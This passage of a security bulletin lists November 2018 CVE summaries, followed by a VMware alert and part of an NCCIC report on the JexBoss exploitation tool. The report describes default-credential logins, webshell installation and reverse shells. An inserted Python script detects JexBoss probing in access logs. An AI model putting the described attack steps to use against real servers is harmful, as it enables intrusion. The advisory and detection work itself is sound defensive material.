        Description: nginx before versions 1.15.6 and 1.14.1 has a vulnerability in the implementation of HTTP/2 that can allow for excessive memory consumption. This issue affects nginx compiled with the ngx_http_v2_module (not compiled by default) if the 'http2' option of the 'listen' directive is used in a configuration file.
        Published: 2018-11-07
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-16843 (MISC, BID, SECTRACK, CONFIRM, UBUNTU, DEBIAN)

    node.js -- node.js
        Description: A path traversal in takeapeek module versions <=0.2.2 allows an attacker to list directories and files.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-16473 (MISC)

    node.js -- node.js
        Description: A stored XSS in tianma-static module versions <=1.0.4 allows an attacker to execute arbitrary JavaScript.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-16474 (MISC)

    node.js -- node.js
        Description: A prototype pollution attack in cached-path-relative versions <=1.0.1 allows an attacker to inject properties on Object.prototype which are then inherited by all the JS objects through the prototype chain, causing a DoS attack.
        Published: 2018-11-06
        CVSS Score: not yet calculated
        Source & Patch Info: CVE-2018-16472 (MISC)
    omron -- cx-supervisorWhen processing project files in Omron CX-Supervisor versions 3.4.1.0 and prior, the application fails to check if it is referencing freed memory, which may allow an attacker to execute code under the context of the application.2018-11-05not yet calculatedCVE-2018-17909
    BID
    MISC
    omron -- cx-supervisorWhen processing project files in Omron CX-Supervisor versions 3.4.1.0 and prior and tampering with the value of an offset, an attacker can force the application to read a value outside of an array.2018-11-05not yet calculatedCVE-2018-17907
    BID
    MISC
    omron -- cx-supervisorA type confusion vulnerability exists when processing project files in Omron CX-Supervisor versions 3.4.1.0 and prior, which may allow an attacker to execute code in the context of the application.2018-11-05not yet calculatedCVE-2018-17913
    BID
    MISC
    omron -- cx-supervisorWhen processing project files in Omron CX-Supervisor versions 3.4.1.0 and prior and tampering with a specific byte, memory corruption may occur within a specific object.2018-11-05not yet calculatedCVE-2018-17905
    BID
    MISC
    open_information _security _foundation -- suricataThe ProcessMimeEntity function in util-decode-mime.c in Suricata 4.x before 4.0.6 allows remote attackers to cause a denial of service (segfault and daemon crash) via crafted input to the SMTP parser, as exploited in the wild in November 2018.2018-11-05not yet calculatedCVE-2018-18956
    CONFIRM
    MISC
    MISC
    oscommerce -- oscommerceosCommerce 2.3.4.1 has an incomplete '.htaccess' for blacklist filtering in the "product" page. The .htaccess file in catalog/images/ bans the html extension, but there are several extensions in which contained HTML can be executed, such as the svg extension.2018-11-05not yet calculatedCVE-2018-18964
    MISC
    oscommerce -- oscommerceosCommerce 2.3.4.1 has an incomplete '.htaccess' for blacklist filtering in the "product" page. The .htaccess file in catalog/images/ bans the html extension, but Internet Explorer render HTML elements in a .eml file.2018-11-05not yet calculatedCVE-2018-18966
    MISC
    oscommerce -- oscommerceosCommerce 2.3.4.1 has an incomplete '.htaccess' for blacklist filtering in the "product" page. The .htaccess file in catalog/images/ bans the html extension, but there are several alternative cases in which HTML can be executed, such as a file with no extension or an unrecognized extension (e.g., the test or test.asdf filename).2018-11-05not yet calculatedCVE-2018-18965
    MISC
    pandao -- editor.mdpandao Editor.md 1.5.0 has DOM XSS via input starting with a "<<" substring, which is mishandled during construction of an A element.2018-11-07not yet calculatedCVE-2018-19056
    MISC
    pdfforge -- pdf_architectMemory corruption in PDMODELProvidePDModelHFT in pdmodel.dll in pdfforge PDF Architect 6 allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact because of a "Data from Faulting Address controls Code Flow" issue.2018-11-10not yet calculatedCVE-2018-19150
    MISC
    MISC
    pluralsight-- javascriptA malicious user with enough administration entitlements can inject html-like elements containing JavaScript statements into Connector names, Report names, AnyTypeClass keys and Policy descriptions. When another user with enough administration entitlements edits one of the Entities above via Admin Console, the injected JavaScript code is executed.2018-11-06not yet calculatedCVE-2018-17184
    MISC
    popojicms -- popojicmisAn issue was discovered in PopojiCMS v2.0.1. It has CSRF via the po-admin/route.php?mod=component&act=addnew URI, as demonstrated by adding a level=1 account.2018-11-05not yet calculatedCVE-2018-18935
    MISC
    popojicms -- popojicmsAn issue was discovered in PopojiCMS v2.0.1. admin_component.php is exploitable via the po-admin/route.php?mod=component&act=addnew URI by using the fupload parameter to upload a ZIP file containing arbitrary PHP code (that is extracted and can be executed). This can also be exploited via CSRF.2018-11-05not yet calculatedCVE-2018-18934
    MISC
    MISC
    popojicms -- popojicmsAn issue was discovered in PopojiCMS v2.0.1. admin_library.php allows remote attackers to delete arbitrary files via directory traversal in the po-admin/route.php?mod=library&act=delete id parameter.2018-11-05not yet calculatedCVE-2018-18936
    MISC
    poppler -- popplerAn issue was discovered in Poppler 0.71.0. There is a NULL pointer dereference in goo/GooString.h, will lead to denial of service, as demonstrated by utils/pdfdetach.cc not validating a filename of an embedded file before constructing a save path.2018-11-07not yet calculatedCVE-2018-19060
    MISC
    poppler -- popplerAn issue was discovered in Poppler 0.71.0. There is a out-of-bounds read in EmbFile::save2 in FileSpec.cc, will lead to denial of service, as demonstrated by utils/pdfdetach.cc not validating embedded files before save attempts.2018-11-07not yet calculatedCVE-2018-19059
    MISC
    poppler -- popplerPoppler before 0.70.0 has a NULL pointer dereference in _poppler_attachment_new when called from poppler_annot_file_attachment_get_attachment.2018-11-10not yet calculatedCVE-2018-19149
    MISC
    poppler -- popplerAn issue was discovered in Poppler 0.71.0. There is a reachable abort in Object.h, will lead to denial of service because EmbFile::save2 in FileSpec.cc lacks a stream check before saving an embedded file.2018-11-07not yet calculatedCVE-2018-19058
    MISC
    powerdns -- recursorAn issue has been found in PowerDNS Recursor from 4.0.0 up to and including 4.1.4. A remote attacker sending a DNS query for a meta-type like OPT can lead to a zone being wrongly cached as failing DNSSEC validation. It only arises if the parent zone is signed, and all the authoritative servers for that parent zone answer with FORMERR to a query for at least one of the meta-types. As a result, subsequent queries from clients requesting DNSSEC validation will be answered with a ServFail.2018-11-09not yet calculatedCVE-2018-14644
    CONFIRM
    CONFIRM
    prestashop -- prestashopPrestaShop 1.6.x before 1.6.1.23 and 1.7.x before 1.7.4.4 allows remote attackers to execute arbitrary code via a file upload.2018-11-09not yet calculatedCVE-2018-19126
    MISC
    MISC
    MISC
    prestashop -- prestashopPrestaShop 1.6.x before 1.6.1.23 and 1.7.x before 1.7.4.4 on Windows allows remote attackers to write to arbitrary image files.2018-11-09not yet calculatedCVE-2018-19124
    MISC
    MISC
    MISC
    prestashop -- prestashopPrestaShop 1.6.x before 1.6.1.23 and 1.7.x before 1.7.4.4 allows remote attackers to delete an image directory.2018-11-09not yet calculatedCVE-2018-19125
    MISC
    MISC
    MISC
    projeqtor -- projeqtorThe image-upload feature in ProjeQtOr 7.2.5 allows remote attackers to execute arbitrary code by uploading a .shtml file with "#exec cmd" because rejected files remain on the server, with predictable filenames, after a "This file is not a valid image" error message.2018-11-04not yet calculatedCVE-2018-18924
    MISC
    EXPLOIT-DB
    publiccms -- publiccmsAn issue was discovered in PublicCMS V4.0. It allows XSS by modifying the page_list "attached" attribute (which typically has 'class="icon-globe icon-large"' in its value), as demonstrated by an 'UPDATE sys_module SET attached = "[XSS]" WHERE id="page_list"' statement.2018-11-04not yet calculatedCVE-2018-18927
    MISC
    qemu -- qemuAn OOB heap buffer r/w access issue was found in the NVM Express Controller emulation in QEMU. It could occur in nvme_cmb_ops routines in nvme device. A guest user/process could use this flaw to crash the QEMU process resulting in DoS or potentially run arbitrary code with privileges of the QEMU process.2018-11-02not yet calculatedCVE-2018-16847
    BID
    CONFIRM
    MISC
    MLIST
    richfaces -- richfacesThe RichFaces Framework 3.X through 3.3.4 is vulnerable to Expression Language (EL) injection via the UserResource resource. A remote, unauthenticated attacker could exploit this to execute arbitrary code using a chain of java serialized objects via org.ajax4jsf.resource.UserResource$UriData.2018-11-06not yet calculatedCVE-2018-14667
    SECTRACK
    REDHAT
    REDHAT
    REDHAT
    CONFIRM
    s-cms -- s-cmsAn issue was discovered in S-CMS v1.5. There is an XSS vulnerability in search.php via the keyword parameter.2018-11-09not yet calculatedCVE-2018-19145
    MISC
    sauter -- case_suiteAn XXE vulnerability exists in CASE Suite Versions 3.10 and prior when processing parameter entities, which may allow remote file disclosure.2018-11-02not yet calculatedCVE-2018-17912
    BID
    MISC
    sennheiser -- headsetupSennheiser HeadSetup 7.3.4903 places Certification Authority (CA) certificates into the Trusted Root CA store of the local system, and publishes the private key in the SennComCCKey.pem file within the public software distribution, which allows remote attackers to spoof arbitrary web sites or software publishers for several years, even if the HeadSetup product is uninstalled. NOTE: a vulnerability-assessment approach must check all Windows systems for CA certificates with a CN of 127.0.0.1 or SennComRootCA, and determine whether those certificates are unwanted.2018-11-09not yet calculatedCVE-2018-17612
    MISC
    shanghai_shengda_network_development_co -- phpcmsA code injection vulnerability in /type.php in PHPCMS 2008 allows attackers to write arbitrary content to a website cache file with a controllable filename, leading to arbitrary code execution. The PHP code is sent via the template parameter, and is written to a data/cache_template/*.tpl.php file along with a "<?php function " substring.2018-11-09not yet calculatedCVE-2018-19127
    MISC
    shangtao_information_technology_co -- wstmartWSTMart 2.0.7 has CSRF via the index.php/admin/staffs/add.html URI.2018-11-09not yet calculatedCVE-2018-19138
    MISC
    sparksuite -- simplemdeSimpleMDE 1.11.2 has XSS via an onerror attribute of a crafted IMG element, or via certain input with [ and ( characters, which is mishandled during construction of an A element.2018-11-07not yet calculatedCVE-2018-19057
    MISC
    squid -- squidSquid before 4.4, when SNMP is enabled, allows a denial of service (Memory Leak) via an SNMP packet.2018-11-09not yet calculatedCVE-2018-19132
    MISC
    MISC
    MISC
    squid -- squid
     
    Squid before 4.4 has XSS via a crafted X.509 certificate during HTTP(S) error page generation for certificate errors.2018-11-09not yet calculatedCVE-2018-19131
    MISC
    MISC
    MISC
    telexy -- qpathAn issue was discovered in Telexy QPath 5.4.462. A low privileged authenticated user supplying a specially crafted serialized request to AdanitDataService.svc may modify user information, including but not limited to email address, username, and password, of other user accounts. The simplest attack approach is for the attacker to intercept their own password-change request and modify the username before the request reaches the server. Also, changing a victim's email address can have a similar account-takeover consequence.2018-11-08not yet calculatedCVE-2018-7718
    MISC
    texas_instruments -- multiple_devicesTexas Instruments BLE-STACK v2.2.1 for SimpleLink CC2640 and CC2650 devices allows remote attackers to execute arbitrary code via a malformed packet that triggers a buffer overflow.2018-11-06not yet calculatedCVE-2018-16986
    CONFIRM
    BID
    SECTRACK
    MISC
    CISCO
    CERT-VN
    tianti -- tiantitianti 2.3 has reflected XSS in the user management module via the tianti-module-admin/user/list userName parameter.2018-11-07not yet calculatedCVE-2018-19091
    MISC
    tianti -- tiantitianti 2.3 allows remote authenticated users to bypass intended permission restrictions by visiting tianti-module-admin/cms/column/list directly to read the column list page or edit a column.2018-11-08not yet calculatedCVE-2018-19109
    MISC
    tianti -- tiantiThe skin-management feature in tianti 2.3 allows remote authenticated users to bypass intended permission restrictions by visiting tianti-module-admin/user/skin/list directly because controller\usercontroller.java maps a /skin/list request to the function skinList, and lacks an authorization check.2018-11-08not yet calculatedCVE-2018-19110
    MISC
    tianti -- tiantitianti 2.3 has stored XSS in the article management module via an article title.2018-11-07not yet calculatedCVE-2018-19090
    MISC
    tianti -- tiantitianti 2.3 has stored XSS in the userlist module via the tianti-module-admin/user/ajax/save_role name parameter, which is mishandled in tianti-module-admin\src\main\webapp\WEB-INF\views\user\user_list.jsp.2018-11-07not yet calculatedCVE-2018-19089
    MISC
    tibco -- active_spacesThe administrative daemon (tibdgadmind) of TIBCO Software Inc.'s TIBCO ActiveSpaces - Community Edition, TIBCO ActiveSpaces - Developer Edition, and TIBCO ActiveSpaces - Enterprise Edition contains a vulnerability which may allow an attacker to perform cross-site request forgery (CSRF) attacks. Affected releases are TIBCO Software Inc.'s TIBCO ActiveSpaces - Community Edition: 3.3.0; 3.4.0; 3.5.0, TIBCO ActiveSpaces - Developer Edition: 3.0.0; 3.1.0; 3.3.0; 3.4.0; 3.5.0, and TIBCO ActiveSpaces - Enterprise Edition: 3.0.0; 3.1.0; 3.2.0; 3.3.0; 3.4.0; 3.5.0.2018-11-06not yet calculatedCVE-2018-12411
    BID
    MISC
    CONFIRM
    tibco -- enterprise_messaging_serviceThe Central Administration server (emsca) component of TIBCO Software Inc.'s TIBCO Enterprise Messaging Service, TIBCO Enterprise Messaging Service - Community Edition, and TIBCO Enterprise Messaging Service - Developer Edition contains a vulnerability which may allow an attacker to perform cross-site request forgery (CSRF) attacks. Affected releases are TIBCO Software Inc.'s TIBCO Enterprise Messaging Service: versions up to and including 8.4.0, TIBCO Enterprise Messaging Service - Community Edition: versions up to and including 8.4.0, and TIBCO Enterprise Messaging Service - Developer Edition versions up to and including 8.4.0.2018-11-06not yet calculatedCVE-2018-12415
    BID
    MISC
    CONFIRM
    tibco -- ftl
     
    The realm server (tibrealmserver) component of TIBCO Software Inc. TIBCO FTL - Community Edition, TIBCO FTL - Developer Edition, and TIBCO FTL - Enterprise Edition contains a vulnerability which may allow an attacker to perform cross-site request forgery (CSRF) attacks. Affected releases are TIBCO Software Inc. TIBCO FTL - Community Edition: versions up to and including 5.4.0, TIBCO FTL - Developer Edition: versions up to and including 5.4.0, TIBCO FTL - Enterprise Edition: versions up to and including 5.4.0.2018-11-06not yet calculatedCVE-2018-12412
    BID
    MISC
    CONFIRM
    tibco -- messagingThe Schema repository server (tibschemad) component of TIBCO Software Inc.'s TIBCO Messaging - Apache Kafka Distribution - Schema Repository - Community Edition, and TIBCO Messaging - Apache Kafka Distribution - Schema Repository - Enterprise Edition contains a vulnerability which may allow an attacker to perform cross-site request forgery (CSRF) attacks. Affected releases are TIBCO Software Inc. TIBCO Messaging - Apache Kafka Distribution - Schema Repository - Community Edition: 1.0.0, and TIBCO Messaging - Apache Kafka Distribution - Schema Repository - Enterprise Edition: 1.0.0.2018-11-06not yet calculatedCVE-2018-12413
    MISC
    CONFIRM
    tibco -- multiple_productsThe Rendezvous Routing Daemon (rvrd), Rendezvous Secure Routing Daemon (rvrsd), Rendezvous Secure Daemon (rvsd), Rendezvous Cache (rvcache), and Rendezvous Daemon Manager (rvdm) components of TIBCO Software Inc.'s TIBCO Rendezvous, TIBCO Rendezvous Developer Edition, TIBCO Rendezvous for z/Linux, TIBCO Rendezvous for z/OS, TIBCO Rendezvous Network Server, TIBCO Substation ES contain vulnerabilities which may allow an attacker to perform cross-site request forgery (CSRF) attacks. Affected releases are TIBCO Software Inc.'s TIBCO Rendezvous: versions up to and including 8.4.5, TIBCO Rendezvous Developer Edition: versions up to and including 8.4.5, TIBCO Rendezvous for z/Linux: versions up to and including 8.4.5, TIBCO Rendezvous for z/OS: versions up to and including 8.4.5, TIBCO Rendezvous Network Server: versions up to and including 1.1.2, and TIBCO Substation ES: versions up to and including 2.12.2.2018-11-06not yet calculatedCVE-2018-12414
    BID
    MISC
    CONFIRM
    vanilla -- vanillaVanilla 2.6.x before 2.6.4 allows remote code execution.2018-11-03not yet calculatedCVE-2018-18903
    MISC
    MISC
    MISC
    wecenter -- wecenterWeCenter 3.2.0 through 3.2.2 has XSS in the views/default/question/index.tpl.html htmlspecialchars_decode function via the /?/publish/ajax/publish_question/ question_content parameter.2018-11-07not yet calculatedCVE-2018-19083
    MISC
    wordpress -- wordpressThe WP Editor.md plugin 10.0.1 for WordPress allows XSS via the comment area.2018-11-04not yet calculatedCVE-2018-18919
    MISC
    wuzhicms -- wuzhicmsAn issue was discovered in WUZHI CMS 4.1.0. There is stored XSS in index.php?m=core&f=index via an ontoggle attribute to details/open/ within a second input field.2018-11-05not yet calculatedCVE-2018-18938
    MISC
    wuzhicms -- wuzhicmsAn issue was discovered in WUZHI CMS 4.1.0. There is stored XSS in index.php?m=core&f=index via a seventh input field.2018-11-05not yet calculatedCVE-2018-18939
    MISC
    xiph -- icecast
     
    A buffer overflow was discovered in the URL-authentication backend of the Icecast before 2.4.4. If the backend is enabled, then any malicious HTTP client can send a request for that specific resource including a crafted header, leading to denial of service and potentially remote code execution.2018-11-05not yet calculatedCVE-2018-18820
    MLIST
    SECTRACK
    GENTOO
    DEBIAN
    yzmcms -- yzmcmsAn issue was discovered in YzmCMS v5.2. It has XSS via a search/index/archives/pubtime/ query string, as demonstrated by the search/index/archives/pubtime/1526387722/page/1.html URI. NOTE: this does not obtain a user's cookie.2018-11-07not yet calculatedCVE-2018-19092
    MISC
    zoho_manageengine -- network_configuration_manager_and_opmanagerAn XML External Entity injection (XXE) vulnerability exists in Zoho ManageEngine Network Configuration Manager and OpManager before 12.3.214 via the RequestXML parameter in a /devices/ProcessRequest.do GET request. For example, the attacker can trigger the transmission of local files to an arbitrary remote FTP server.2018-11-05not yet calculatedCVE-2018-18980
    MISC
    MISC
    zoho_manageengine -- opmanagerZoho ManageEngine OpManager 12.3 before 123222 has SQL Injection via Mail Server settings.2018-11-05not yet calculatedCVE-2018-18949
    MISC
    zyxel -- zywall_usg_devicesZyXEL ZyWALL USG 2.12 AQQ.2 and 3.30 AQQ.7 devices are affected by a CSRF vulnerability via a cgi-bin/zysh-cgi cmd action to add a user account. This account's access could, for example, subsequently be used for stored XSS.2018-11-10not yet calculatedCVE-2017-17550
    MISC


  • Original release date: November 09, 2018

    VMware has released security updates to address vulnerabilities in ESXi, Workstation, and Fusion. An attacker could exploit these vulnerabilities to take control of an affected system.

    NCCIC encourages users and administrators to review the VMware Security Advisory VMSA-2018-0027 and apply the necessary updates.




  • Original release date: November 08, 2018

    NCCIC has released Analysis Report (AR) AR18-312A: JexBoss - JBoss Verify and EXploitation Tool. Cyber threat actors use JexBoss to remotely access victims' systems. The report provides information on JexBoss' capabilities, as well as suggestions for detection and mitigation.

    NCCIC encourages users and administrators to review AR18-312A for more information.




  • Original release date: November 08, 2018

    Summary

    JBoss Verify and EXploitation tool (JexBoss) is an open-source tool used by cybersecurity hunt teams (sometimes referred to as "red teams") and auditors to conduct authorized security assessments. Threat actors use this tool maliciously to test and exploit vulnerabilities in JBoss Application Server (JBoss AS), now WildFly, and a variety of Java applications and platforms. JexBoss automates all the phases of a cyberattack, making it a powerful and easy-to-use weapon in a threat actor's cyber arsenal.

    This report provides a detailed analysis of JexBoss' functionality, along with detection, response, prevention, and mitigation recommendations.

    Description

    JexBoss

    JexBoss is a tool used to test and exploit vulnerabilities in Java applications and platforms, including the JBoss AS/WildFly web server framework. JexBoss is written in the Python programming language using standard Python libraries. JexBoss is run from the command-line interface (CLI) and operated using a console interface. JexBoss was released as an open-source tool on GitHub in November 2014. JexBoss' author regularly added new features and exploits until March 2017.

    Early versions of JexBoss specifically targeted JBoss AS versions 3 through 6. JexBoss has since evolved into a framework that can be used to test and exploit generic Java-related vulnerabilities over HyperText Transfer Protocol (HTTP).

    In addition to testing JBoss AS for weak default configurations, JexBoss includes exploits for a variety of known vulnerabilities in Java-based frameworks, including some versions of Java Server Faces, Java Seam Framework, Remote Method Invocation over HTTP, Jenkins CLI, Remote Java Management Extension (JMX), and Apache Struts.

    JexBoss also offers attackers the ability to target deserialization vulnerabilities in generic Java applications and servlets by allowing an attacker to specifically target Uniform Resource Locators (URLs) and HTTP POST parameters. This capability can help attackers customize their attacks against their target and exploit zero-day Java deserialization vulnerabilities.

    JexBoss' ultimate goal is to provide the attacker with a means of executing arbitrary operating system (OS) commands on the target host. This is achieved by using one of the following mechanisms:

    • Installation of a webshell: allows an attacker to submit OS commands to a particular HTTP URL and receive the output of the executed command in the HTTP response.
    • Blind command injection: allows an attacker to submit OS commands as part of a packaged exploit for a specific vulnerability. The command will be executed, but the attacker will not see the output.
    • Establishment of a reverse shell: both a webshell and a blind command injection can facilitate a third method of executing arbitrary OS commands: the establishment of a reverse shell. In the establishment of a reverse shell, the target initiates a Transmission Control Protocol (TCP) connection with the host and port of the attacker's choice, after which commands and command outputs are transferred over that new connection.

    JBoss AS/WildFly

    JBoss AS/WildFly is a Java-based web server framework that simplifies the process of installing, deploying, and maintaining servlets. JBoss AS was released in 2002 as JBoss AS version 3 and was under continued development until 2012, with the final release of JBoss AS 7.1.1. JBoss AS 7.1.1 was then rebranded under the community project WildFly, which remains under continued development and maintenance. Legacy versions of JBoss AS (particularly versions 6 and older) have unpatched security vulnerabilities because they are no longer maintained. In August 2018, NCCIC's search via the Shodan search engine showed at least 28,060 web servers running outdated and unsupported JBoss AS software.

    Reported Use of JexBoss

    In March 2016, the Cisco Talos Intelligence Group (Talos) investigated a widespread ransomware campaign known as SamSam, which was targeting the healthcare industry.[1] Talos identified numerous instances where the attackers used JexBoss to gain initial access to the target network through vulnerable versions of JBoss AS. The attackers then moved laterally to reach the intended ransomware targets. This campaign was the first widely reported use of JexBoss.

    The April 2017 Symantec Internet Security Threat Report documented an intrusion by the Iran-based Chafer espionage group against a target in Turkey. In that intrusion, Chafer used JexBoss to identify and exploit a vulnerable version of JBoss AS, then moved laterally into other computers on the victim's network.[2]

    These two instances illustrate threat actors' use of JexBoss to gain initial access to vulnerable internet-facing versions of JBoss AS. The threat actors leveraged their initial access to move deeper into a victim's network. The success of these exploits highlights the victims' weak web server sustainment practices (i.e., failure to upgrade to a more secure version of JBoss AS/WildFly).

    Although more commonly used by threat actors, cybersecurity hunt teams also use JexBoss to evaluate the security of Java web platforms. When a hunt team finds a vulnerable web server, they can leverage JexBoss to pivot into other systems on the target network, which provides a more comprehensive security evaluation.

    Executing JexBoss

    JexBoss can be run from most standard OSs. To show JexBoss' interface and analyze the tool's behavior, NCCIC ran JexBoss from an Ubuntu Linux system against a vulnerable version of JBoss AS 6.1.0 in a secured test environment.

    When run without any command-line options, JexBoss' default behavior is to display a banner followed by a list of command-line option examples that demonstrate different ways to run JexBoss. JexBoss then exits without performing any further actions.

    An attacker can supply command-line options to JexBoss to alter the tool's default behavior. A command-line option (hereafter known as an option) modifies the operation of a command. The command's program determines the effect of the option. Options follow the command name on the command line, separated by spaces. Some options require a value to specify variable parameters.

    JexBoss Modes

    An attacker can run JexBoss in one of three "modes":

    • Standalone mode: this is JexBoss' default mode, used to scan a single target;
    • Auto-scan mode: this mode is used to identify and scan all possible targets in a network; and
    • File-scan mode: this mode is used to scan targets specified in a file.

    Each scan involves the attacker's computer connecting to the target computer to probe for vulnerabilities that JexBoss has the ability to exploit. After a scan completes, JexBoss will not automatically attempt to exploit a target unless given additional options or instructions.

    Standalone Mode

    The -mode standalone option instructs JexBoss to run in standalone mode, targeting a single host. Standalone mode is the default mode, so this option may be omitted from the command line.

    Standalone mode requires either the -host HOST or the -u HOST option, the value specifying the target to scan. (The -host HOST and -u HOST options behave identically.) The HOST value indicates the target's network protocol, host (Internet Protocol [IP] address or domain name), and port. In the example shown in figure 1, JexBoss will scan the target host at IP address 127[.]0[.]0[.]1 using HTTP and TCP port 8080.

    Note: for the remainder of this report, if two options behave identically, they will be shown with a slash ("/") between them. For example, the -host HOST and -u HOST options will be shown as -host/-u HOST.

    Figure 1: JexBoss screenshot, specifying the target on the command line (image not reproduced; it shows the JexBoss interface with the target IP address on the command line)

    Note: all JexBoss screenshots in this report show JexBoss in standalone mode.

    Auto-Scan Mode

    The -mode auto-scan option instructs JexBoss to use auto-scan mode to identify and scan multiple hosts in a network block. This mode makes use of additional options:

    • -network NETWORK,
    • -ports PORTS, and
    • -results LOGFILENAME.

    NETWORK must be a block of IP addresses in Classless Internet Domain Routing notation. If this option is omitted, JexBoss will scan the /16 network block of the attacking computer?s primary network interface. PORTS must be a comma-separated list of TCP ports. If this option is omitted, JexBoss will scan each IP address for TCP ports 80 and 8080, the standard HTTP ports.

    JexBoss will scan the target block of IP addresses by attempting to connect to each IP address within the network block on each target TCP port. The results of the scan are written to the LOGFILENAME file, or jexboss_auto_scan_results.log if the -results option is omitted.

    File-Scan Mode

    The -mode file-scan option instructs JexBoss to use file-scan mode to scan multiple hosts specified in a file. This mode makes use of two additional options:

    • -file FILENAME, and
    • -out LOGFILENAME.

    The -file option is required for file-scan mode. The contents of the FILENAME file must be a list of targets, one per line, in the same format as required by the -host/-u HOST option. JexBoss will attempt to scan each target specified in the FILENAME file. The results of the scan are written to the LOGFILENAME file, or to jexboss_file_scan_results.log if the -out option is omitted.

    JexBoss Vulnerability Scan

    JexBoss scans targets to test whether they are vulnerable to several known exploits (e.g., weak authentication, Java object deserialization flaws). JexBoss then displays a report with the test results, indicating whether the tested components are exposed, vulnerable, or secured (the indicator for a secured component is "OK").


    The results shown in figure 2 indicate that the JBoss admin-console is exposed (i.e., reachable by the attacker) and that the JBoss AS jmx-console and JMXInvokerServlet components are vulnerable to exploitation. The results identify the other applications and frameworks as safe from the JexBoss exploits.

    Figure 2: JexBoss screenshot, vulnerability test results (image not reproduced; it shows the tool's report after testing a target host for vulnerabilities)

    Note: in a properly managed JBoss AS deployment, the admin-console should not be reachable from the internet; it should only be reachable from trusted internal hosts. However, even if an admin-console is only reachable from trusted internal hosts, dedicated attackers may be able to gain access to those internal hosts and attack the JBoss AS deployment from there.
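The scan results above name the components a defender should watch for in web server logs: admin-console, jmx-console and JMXInvokerServlet. The following detection logic is an added example, not part of the NCCIC report or of JexBoss itself; it parses Combined Log Format access-log lines and flags untrusted sources that touch those components. The trusted subnet prefix, the sample log lines and the severity labels are all constructed assumptions.

```python
"""Flag JexBoss-style probing of JBoss management components in access logs."""
import re
from collections import defaultdict

# JBoss AS management components that JexBoss tests (named in the report's
# figure 2 results). Requests to these from outside the admin network are
# suspicious regardless of whether the component turns out to be vulnerable.
MGMT_PATHS = {
    "/admin-console": "admin-console",
    "/jmx-console": "jmx-console",
    "/invoker/JMXInvokerServlet": "JMXInvokerServlet",
}

# Assumption (constructed): the only subnet from which console access is legitimate.
TRUSTED_PREFIXES = ("10.1.2.",)

# Combined Log Format; only the fields this analysis needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log: one external host sweeps all three components and
# then POSTs to the admin-console login and to the invoker servlet; one
# internal admin host and one unrelated visitor are included as negatives.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Nov/2018:10:01:02 +0000] "GET /jmx-console/ HTTP/1.1" 200 5120
203.0.113.7 - - [05/Nov/2018:10:01:03 +0000] "GET /admin-console/ HTTP/1.1" 200 3310
203.0.113.7 - - [05/Nov/2018:10:01:04 +0000] "GET /invoker/JMXInvokerServlet HTTP/1.1" 200 1330
203.0.113.7 - - [05/Nov/2018:10:01:06 +0000] "POST /admin-console/login HTTP/1.1" 302 0
203.0.113.7 - - [05/Nov/2018:10:01:09 +0000] "POST /invoker/JMXInvokerServlet HTTP/1.1" 200 1400
10.1.2.15 - - [05/Nov/2018:10:05:00 +0000] "GET /admin-console/ HTTP/1.1" 200 3310
198.51.100.9 - - [05/Nov/2018:10:07:44 +0000] "GET /index.html HTTP/1.1" 200 812
""".splitlines()


def parse_line(line):
    """Return a dict with ip, ts, method, path, status (int), or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def component_for(path):
    """Map a request path to the management component it belongs to, if any."""
    for prefix, name in MGMT_PATHS.items():
        if path == prefix or path.startswith(prefix + "/") or path.startswith(prefix + "?"):
            return name
    return None


def is_trusted(ip):
    return ip.startswith(TRUSTED_PREFIXES)


def analyze(lines):
    """Return a list of (severity, ip, message) findings for untrusted sources."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        comp = component_for(rec["path"])
        if comp and not is_trusted(rec["ip"]):
            per_ip[rec["ip"]].append((comp, rec["method"], rec["status"]))

    findings = []
    for ip, hits in per_ip.items():
        comps = {c for c, _, _ in hits}
        # Touching several components in a row is the scan phase of the report.
        if len(comps) >= 2:
            findings.append(("high", ip, f"scan of {len(comps)} management components: {sorted(comps)}"))
        else:
            findings.append(("medium", ip, f"request to {sorted(comps)[0]} from outside the trusted range"))
        # A POST to the invoker servlet is the serialized-object invocation path.
        if any(c == "JMXInvokerServlet" and m == "POST" for c, m, _ in hits):
            findings.append(("critical", ip, "POST to JMXInvokerServlet from outside the trusted range"))
        # An accepted admin-console login from outside matches the default-credential step.
        if any(c == "admin-console" and m == "POST" and s in (200, 302) for c, m, s in hits):
            findings.append(("critical", ip, "admin-console login POST accepted from outside the trusted range"))
    return findings


if __name__ == "__main__":
    for severity, ip, message in analyze(SAMPLE_LOG):
        print(f"[{severity.upper()}] {ip}: {message}")
```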

    JexBoss Exploitation

    After scanning, JexBoss may perform exploitation of identified vulnerabilities depending upon the mode and options chosen.

    When run in standalone mode, JexBoss will display the results of the scan as shown in figure 2 by default. JexBoss will then enter an interactive mode that asks the attacker for input. As shown in figure 3, JexBoss will ask the attacker whether it should try to run an automated exploitation of a specific vulnerability.

    A screenshot from JexBoss that shows the tool asking if the user would like to continue

    Figure 3: JexBoss screenshot - JexBoss asks permission to continue

    If the attacker answers yes, JexBoss will attempt to exploit the vulnerability in admin-console.

    Figure 4 illustrates JexBoss targeting the admin-console component to determine if the JBoss AS platform is configured with the default administrator username and password, which would be the case for an improperly managed JBoss AS deployment. In the exploit attempt shown in figure 4, JexBoss is attempting to log in to JBoss AS with default credentials. Alternatively, the attacker can specify the credentials JexBoss should attempt to use for the login by using the -J/--jboss-login options.

    A screenshot of the JexBoss tool showing the tool's interactive exploitation of the target admin-console

    Figure 4: JexBoss screenshot - interactive exploitation of the admin-console

    Figure 4 indicates success for several phases of the exploit attempt. These phases are listed below.

    • Delivery: JexBoss attempted login with default credentials; this attempt was sent to the JBoss AS admin-console.
      • The success of this attempt is indicated by the phrase: "Trying to perform authentication with default credentials".
    • Exploitation: JexBoss successfully logged in with default credentials.
      • The success of this attempt is indicated by the phrase: "Successfully logged in!"
    • Installation: JexBoss successfully deployed the webshell code.
